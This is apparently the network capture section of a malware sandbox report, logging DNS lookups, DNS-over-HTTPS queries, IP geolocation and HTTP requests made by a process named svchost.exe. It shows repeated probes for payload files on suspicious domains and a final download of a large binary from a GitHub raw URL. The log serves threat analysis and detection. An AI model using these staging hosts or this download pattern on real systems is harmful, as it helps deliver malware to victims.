                                                                                            Dec 20, 2024 16:21:56.786257029 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.786295891 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.786340952 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.786361933 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.786392927 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.786405087 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.798136950 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.798160076 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:56.798199892 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:56.798228025 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:57.003345966 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:57.045649052 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:57.255337000 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:57.256129026 CET49873443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:57.695336103 CET44349873185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:57.695395947 CET49873443192.168.2.8185.199.108.133

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Dec 20, 2024 16:20:17.062185049 CET5485653192.168.2.81.1.1.1
                                                                                            Dec 20, 2024 16:20:17.440871954 CET53548561.1.1.1192.168.2.8
                                                                                            Dec 20, 2024 16:20:22.021013975 CET5896953192.168.2.81.1.1.1
                                                                                            Dec 20, 2024 16:20:22.158576965 CET53589691.1.1.1192.168.2.8
                                                                                            Dec 20, 2024 16:20:30.118288994 CET6110653192.168.2.81.1.1.1
                                                                                            Dec 20, 2024 16:20:30.558769941 CET53611061.1.1.1192.168.2.8
                                                                                            Dec 20, 2024 16:20:43.313679934 CET5606253192.168.2.81.1.1.1
                                                                                            Dec 20, 2024 16:20:43.451956034 CET53560621.1.1.1192.168.2.8
                                                                                            Dec 20, 2024 16:20:52.892563105 CET6336453192.168.2.81.1.1.1
                                                                                            Dec 20, 2024 16:20:53.261164904 CET53633641.1.1.1192.168.2.8
                                                                                            Dec 20, 2024 16:20:58.266985893 CET5756853192.168.2.81.1.1.1
                                                                                            Dec 20, 2024 16:20:58.406912088 CET53575681.1.1.1192.168.2.8
                                                                                            Dec 20, 2024 16:21:11.332559109 CET5175153192.168.2.81.1.1.1
                                                                                            Dec 20, 2024 16:21:11.469702959 CET53517511.1.1.1192.168.2.8
                                                                                            Dec 20, 2024 16:21:18.064047098 CET5944453192.168.2.81.1.1.1
                                                                                            Dec 20, 2024 16:21:18.202142000 CET53594441.1.1.1192.168.2.8
                                                                                            Dec 20, 2024 16:21:20.467987061 CET6024953192.168.2.81.1.1.1
                                                                                            Dec 20, 2024 16:21:20.607717037 CET53602491.1.1.1192.168.2.8

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Dec 20, 2024 16:20:17.062185049 CET192.168.2.81.1.1.10xd69Standard query (0)unvmainx.comA (IP address)IN (0x0001)false
                                                                                            Dec 20, 2024 16:20:22.021013975 CET192.168.2.81.1.1.10xdaffStandard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                            Dec 20, 2024 16:20:30.118288994 CET192.168.2.81.1.1.10x63b2Standard query (0)unvdwl.comA (IP address)IN (0x0001)false
                                                                                            Dec 20, 2024 16:20:43.313679934 CET192.168.2.81.1.1.10x173bStandard query (0)dns.googleA (IP address)IN (0x0001)false
                                                                                            Dec 20, 2024 16:20:52.892563105 CET192.168.2.81.1.1.10x983aStandard query (0)rootunvdwl.comA (IP address)IN (0x0001)false
                                                                                            Dec 20, 2024 16:20:58.266985893 CET192.168.2.81.1.1.10x3e06Standard query (0)rootunvdwl.comA (IP address)IN (0x0001)false
                                                                                            Dec 20, 2024 16:21:11.332559109 CET192.168.2.81.1.1.10x335Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                            Dec 20, 2024 16:21:18.064047098 CET192.168.2.81.1.1.10xbd48Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                            Dec 20, 2024 16:21:20.467987061 CET192.168.2.81.1.1.10x5af6Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Dec 20, 2024 16:20:17.440871954 CET1.1.1.1192.168.2.80xd69No error (0)unvmainx.com194.26.192.189A (IP address)IN (0x0001)false
                                                                                            Dec 20, 2024 16:20:22.158576965 CET1.1.1.1192.168.2.80xdaffNo error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                            Dec 20, 2024 16:20:30.558769941 CET1.1.1.1192.168.2.80x63b2No error (0)unvdwl.com45.94.31.128A (IP address)IN (0x0001)false
                                                                                            Dec 20, 2024 16:20:43.451956034 CET1.1.1.1192.168.2.80x173bNo error (0)dns.google8.8.4.4A (IP address)IN (0x0001)false
                                                                                            Dec 20, 2024 16:20:43.451956034 CET1.1.1.1192.168.2.80x173bNo error (0)dns.google8.8.8.8A (IP address)IN (0x0001)false
                                                                                            Dec 20, 2024 16:21:11.469702959 CET1.1.1.1192.168.2.80x335No error (0)github.com20.233.83.145A (IP address)IN (0x0001)false
                                                                                            Dec 20, 2024 16:21:18.202142000 CET1.1.1.1192.168.2.80xbd48No error (0)github.com20.233.83.145A (IP address)IN (0x0001)false
                                                                                            Dec 20, 2024 16:21:20.607717037 CET1.1.1.1192.168.2.80x5af6No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                            Dec 20, 2024 16:21:20.607717037 CET1.1.1.1192.168.2.80x5af6No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                            Dec 20, 2024 16:21:20.607717037 CET1.1.1.1192.168.2.80x5af6No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                            Dec 20, 2024 16:21:20.607717037 CET1.1.1.1192.168.2.80x5af6No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • ipinfo.io
                                                                                            • dns.google
                                                                                            • github.com
                                                                                            • raw.githubusercontent.com

                                                                                            HTTP Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.84971745.94.31.128806848C:\Windows\System32\svchost.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Dec 20, 2024 16:20:30.680303097 CET74OUTHEAD /un1/unvurestorehardx.dat HTTP/1.1
                                                                                            Host: unvdwl.com
                                                                                            Accept: */*
                                                                                            Dec 20, 2024 16:20:31.921175957 CET164INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.22.0 (Ubuntu)
                                                                                            Date: Fri, 20 Dec 2024 15:20:31 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 162
                                                                                            Connection: keep-alive


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.84972045.94.31.128806848C:\Windows\System32\svchost.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Dec 20, 2024 16:20:37.059886932 CET74OUTHEAD /un1/unvurestorehardx.dat HTTP/1.1
                                                                                            Host: unvdwl.com
                                                                                            Accept: */*
                                                                                            Dec 20, 2024 16:20:38.300461054 CET164INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.22.0 (Ubuntu)
                                                                                            Date: Fri, 20 Dec 2024 15:20:38 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 162
                                                                                            Connection: keep-alive


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.84972945.94.31.128806848C:\Windows\System32\svchost.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Dec 20, 2024 16:20:51.637906075 CET76OUTHEAD /un1/unvurestorehardx.dat HTTP/1.1
                                                                                            Host: 45.94.31.128
                                                                                            Accept: */*
                                                                                            Dec 20, 2024 16:20:52.890250921 CET164INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.22.0 (Ubuntu)
                                                                                            Date: Fri, 20 Dec 2024 15:20:52 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 162
                                                                                            Connection: keep-alive


                                                                                            HTTPS Proxied Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.84971434.117.59.814436848C:\Windows\System32\svchost.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-20 15:20:29 UTC52OUTGET /json HTTP/1.1
                                                                                            Host: ipinfo.io
                                                                                            Accept: */*
                                                                                            2024-12-20 15:20:30 UTC345INHTTP/1.1 200 OK
                                                                                            access-control-allow-origin: *
                                                                                            Content-Length: 321
                                                                                            content-type: application/json; charset=utf-8
                                                                                            date: Fri, 20 Dec 2024 15:20:29 GMT
                                                                                            x-content-type-options: nosniff
                                                                                            via: 1.1 google
                                                                                            strict-transport-security: max-age=2592000; includeSubDomains
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close
                                                                                            2024-12-20 15:20:30 UTC321INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a
                                                                                            Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.8497278.8.4.44436848C:\Windows\System32\svchost.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-20 15:20:51 UTC72OUTGET /resolve?name=unvdwl.com HTTP/1.1
                                                                                            Host: dns.google
                                                                                            Accept: */*
                                                                                            2024-12-20 15:20:51 UTC548INHTTP/1.1 200 OK
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Date: Fri, 20 Dec 2024 15:20:51 GMT
                                                                                            Expires: Fri, 20 Dec 2024 15:20:51 GMT
                                                                                            Cache-Control: private, max-age=9918
                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                            Server: HTTP server (unknown)
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Accept-Ranges: none
                                                                                            Vary: Accept-Encoding
                                                                                            Connection: close
                                                                                            Transfer-Encoding: chunked
                                                                                            2024-12-20 15:20:51 UTC192INData Raw: 62 61 0d 0a 7b 22 53 74 61 74 75 73 22 3a 30 2c 22 54 43 22 3a 66 61 6c 73 65 2c 22 52 44 22 3a 74 72 75 65 2c 22 52 41 22 3a 74 72 75 65 2c 22 41 44 22 3a 66 61 6c 73 65 2c 22 43 44 22 3a 66 61 6c 73 65 2c 22 51 75 65 73 74 69 6f 6e 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 75 6e 76 64 77 6c 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 7d 5d 2c 22 41 6e 73 77 65 72 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 75 6e 76 64 77 6c 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 2c 22 54 54 4c 22 3a 39 39 31 38 2c 22 64 61 74 61 22 3a 22 34 35 2e 39 34 2e 33 31 2e 31 32 38 22 7d 5d 7d 0d 0a
                                                                                            Data Ascii: ba{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"unvdwl.com.","type":1}],"Answer":[{"name":"unvdwl.com.","type":1,"TTL":9918,"data":"45.94.31.128"}]}
                                                                                            2024-12-20 15:20:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.8497798.8.4.44436848C:\Windows\System32\svchost.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-20 15:21:10 UTC76OUTGET /resolve?name=rootunvdwl.com HTTP/1.1
                                                                                            Host: dns.google
                                                                                            Accept: */*
                                                                                            2024-12-20 15:21:11 UTC548INHTTP/1.1 200 OK
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Date: Fri, 20 Dec 2024 15:21:11 GMT
                                                                                            Expires: Fri, 20 Dec 2024 15:21:11 GMT
                                                                                            Cache-Control: private, max-age=1174
                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                            Server: HTTP server (unknown)
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Accept-Ranges: none
                                                                                            Vary: Accept-Encoding
                                                                                            Connection: close
                                                                                            Transfer-Encoding: chunked
                                                                                            2024-12-20 15:21:11 UTC264INData Raw: 31 30 31 0d 0a 7b 22 53 74 61 74 75 73 22 3a 30 2c 22 54 43 22 3a 66 61 6c 73 65 2c 22 52 44 22 3a 74 72 75 65 2c 22 52 41 22 3a 74 72 75 65 2c 22 41 44 22 3a 66 61 6c 73 65 2c 22 43 44 22 3a 66 61 6c 73 65 2c 22 51 75 65 73 74 69 6f 6e 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 72 6f 6f 74 75 6e 76 64 77 6c 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 7d 5d 2c 22 41 75 74 68 6f 72 69 74 79 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 72 6f 6f 74 75 6e 76 64 77 6c 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 36 2c 22 54 54 4c 22 3a 31 31 37 34 2c 22 64 61 74 61 22 3a 22 31 2d 79 6f 75 2e 6e 6a 61 6c 6c 61 2e 6e 6f 2e 20 79 6f 75 2e 63 61 6e 2d 67 65 74 2d 6e 6f 2e 69 6e 66 6f 2e 20 32 30 32 34 30 39 32 37 30 38 20 32 31 36 30 30 20 37 32 30 30 20 31 38 31 34 34 30 30 20 33
                                                                                            Data Ascii: 101{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"rootunvdwl.com.","type":1}],"Authority":[{"name":"rootunvdwl.com.","type":6,"TTL":1174,"data":"1-you.njalla.no. you.can-get-no.info. 2024092708 21600 7200 1814400 3
                                                                                            2024-12-20 15:21:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.84980420.233.83.1454436848C:\Windows\System32\svchost.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-20 15:21:19 UTC94OUTHEAD /unvdwl/dwl/raw/main/unvumainrestorehardx.dat HTTP/1.1
                                                                                            Host: github.com
                                                                                            Accept: */*
                                                                                            2024-12-20 15:21:20 UTC442INHTTP/1.1 404 Not Found
                                                                                            Server: GitHub.com
                                                                                            Date: Fri, 20 Dec 2024 15:21:11 GMT
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                            Cache-Control: no-cache
                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                            X-Frame-Options: deny
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 0
                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                            2024-12-20 15:21:20 UTC3383INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.849829185.199.108.1334436848C:\Windows\System32\svchost.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-20 15:21:28 UTC123OUTHEAD /rootunvbot/mydata/refs/heads/main/unvumainrestorehardx.dat HTTP/1.1
                                                                                            Host: raw.githubusercontent.com
                                                                                            Accept: */*
                                                                                            2024-12-20 15:21:28 UTC804INHTTP/1.1 404 Not Found
                                                                                            Connection: close
                                                                                            Content-Length: 14
                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-Frame-Options: deny
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                            X-GitHub-Request-Id: E7DD:1E2FCC:102100F:11FBC66:67658B77
                                                                                            Accept-Ranges: bytes
                                                                                            Date: Fri, 20 Dec 2024 15:21:28 GMT
                                                                                            Via: 1.1 varnish
                                                                                            X-Served-By: cache-ewr-kewr1740054-EWR
                                                                                            X-Cache: MISS
                                                                                            X-Cache-Hits: 0
                                                                                            X-Timer: S1734708088.395102,VS0,VE8
                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                            X-Fastly-Request-ID: f4ac69695fb846c7d8c2b5d2b72fff0393e58471
                                                                                            Expires: Fri, 20 Dec 2024 15:26:28 GMT
                                                                                            Source-Age: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.84985320.233.83.1454436848C:\Windows\System32\svchost.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-20 15:21:36 UTC94OUTHEAD /runvd01/dwl/raw/refs/heads/main/un1/uusb.dat HTTP/1.1
                                                                                            Host: github.com
                                                                                            Accept: */*
                                                                                            2024-12-20 15:21:37 UTC555INHTTP/1.1 302 Found
                                                                                            Server: GitHub.com
                                                                                            Date: Fri, 20 Dec 2024 15:21:22 GMT
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                            Access-Control-Allow-Origin:
                                                                                            Location: https://raw.githubusercontent.com/runvd01/dwl/refs/heads/main/un1/uusb.dat
                                                                                            Cache-Control: no-cache
                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                            X-Frame-Options: deny
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 0
                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                            2024-12-20 15:21:37 UTC3380INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            6192.168.2.849861185.199.108.1334436848C:\Windows\System32\svchost.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-20 15:21:38 UTC105OUTHEAD /runvd01/dwl/refs/heads/main/un1/uusb.dat HTTP/1.1
                                                                                            Host: raw.githubusercontent.com
                                                                                            Accept: */*
                                                                                            2024-12-20 15:21:39 UTC900INHTTP/1.1 200 OK
                                                                                            Connection: close
                                                                                            Content-Length: 94192128
                                                                                            Cache-Control: max-age=300
                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                            Content-Type: application/octet-stream
                                                                                            ETag: "dce1db2ce302903971db053f8dd758f861a96202945985b58fb23f43edfcddee"
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-Frame-Options: deny
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            X-GitHub-Request-Id: 3BE7:C89C2:2E62F1:33B873:676568E7
                                                                                            Accept-Ranges: bytes
                                                                                            Date: Fri, 20 Dec 2024 15:21:38 GMT
                                                                                            Via: 1.1 varnish
                                                                                            X-Served-By: cache-ewr-kewr1740037-EWR
                                                                                            X-Cache: HIT
                                                                                            X-Cache-Hits: 0
                                                                                            X-Timer: S1734708099.949680,VS0,VE9
                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                            X-Fastly-Request-ID: e20738dd108177a3fb9f55193c7cd13e20a586e9
                                                                                            Expires: Fri, 20 Dec 2024 15:26:38 GMT
                                                                                            Source-Age: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            7192.168.2.84986720.233.83.1454436848C:\Windows\System32\svchost.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-20 15:21:40 UTC93OUTGET /runvd01/dwl/raw/refs/heads/main/un1/uusb.dat HTTP/1.1
                                                                                            Host: github.com
                                                                                            Accept: */*
                                                                                            2024-12-20 15:21:41 UTC555INHTTP/1.1 302 Found
                                                                                            Server: GitHub.com
                                                                                            Date: Fri, 20 Dec 2024 15:21:22 GMT
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                            Access-Control-Allow-Origin:
                                                                                            Location: https://raw.githubusercontent.com/runvd01/dwl/refs/heads/main/un1/uusb.dat
                                                                                            Cache-Control: no-cache
                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                            X-Frame-Options: deny
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 0
                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                            2024-12-20 15:21:41 UTC3380INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            8192.168.2.849873185.199.108.1334436848C:\Windows\System32\svchost.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-20 15:21:42 UTC104OUTGET /runvd01/dwl/refs/heads/main/un1/uusb.dat HTTP/1.1
                                                                                            Host: raw.githubusercontent.com
                                                                                            Accept: */*
                                                                                            2024-12-20 15:21:43 UTC905INHTTP/1.1 200 OK
                                                                                            Connection: close
                                                                                            Content-Length: 94192128
                                                                                            Cache-Control: max-age=300
                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                            Content-Type: application/octet-stream
                                                                                            ETag: "dce1db2ce302903971db053f8dd758f861a96202945985b58fb23f43edfcddee"
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-Frame-Options: deny
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            X-GitHub-Request-Id: 17E5:140A97:F851C7:115FED7:67658B86
                                                                                            Accept-Ranges: bytes
                                                                                            Date: Fri, 20 Dec 2024 15:21:43 GMT
                                                                                            Via: 1.1 varnish
                                                                                            X-Served-By: cache-nyc-kteb1890090-NYC
                                                                                            X-Cache: MISS
                                                                                            X-Cache-Hits: 0
                                                                                            X-Timer: S1734708103.893557,VS0,VE484
                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                            X-Fastly-Request-ID: caa779bbae0cd484c72231e12566b2cf293a20fd
                                                                                            Expires: Fri, 20 Dec 2024 15:26:43 GMT
                                                                                            Source-Age: 0
